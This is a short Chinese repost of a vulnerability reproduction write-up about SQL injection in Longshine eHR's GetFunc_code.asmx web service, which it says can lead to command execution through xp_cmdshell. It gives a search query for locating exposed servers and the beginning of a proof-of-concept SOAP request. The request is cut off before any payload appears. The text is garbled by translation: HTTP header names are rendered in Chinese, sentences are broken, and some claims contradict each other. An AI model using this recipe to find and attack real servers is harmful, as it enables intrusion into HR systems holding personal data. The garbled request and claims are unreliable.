0x01 产品简介
朗新eHR是北京朗新天机软件技术有限公司开发的人力资源管理系统。该产品融合了国外先进的人才管理理念和国内众多的人才管理实践,使其成为最全面、性价比最高的产品之一。中国有效的人力资源管理系统以其集成化、自动化、数据库化、移动化等特点,在企业管理中发挥着重要作用。不仅提高了企业的管理效率和水平,而且促进了员工和组织的发展,有力支撑了企业的可持续发展。
0x02 漏洞概述
朗信天机eHR中的GetFunc_code.asmx接口的多个实例(包括GetMessage、GetShortMessage和GetToken)包含SQL注入漏洞,可能允许未经身份验证的远程攻击者利用SQL注入漏洞执行任意命令并与数据库交互。服务器上的xp_cmdshell。经分析判断,该漏洞利用难度较大,建议您尽快修复。
0x03 复现环境
福法:
body=\’/default.aspx?ReturnUrl=%2f\’ body=\’silverlight\’
0x04 漏洞复现
概念验证-1
POST /ws/GetFunc_code.asmx HTTP/1.1
Host:你的IP
内容类型: 文本/xml; 字符集=utf-8;
内容长度: 长度
SOAPAction: \’http://tempuri.org/Get
#浪芯天机eHR 以上关于GetFunc_code.asmx中SQL注入导致RCE漏洞重现的相关内容由网络提供,仅供参考。相关信息请参见官方公告。
原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/93035.html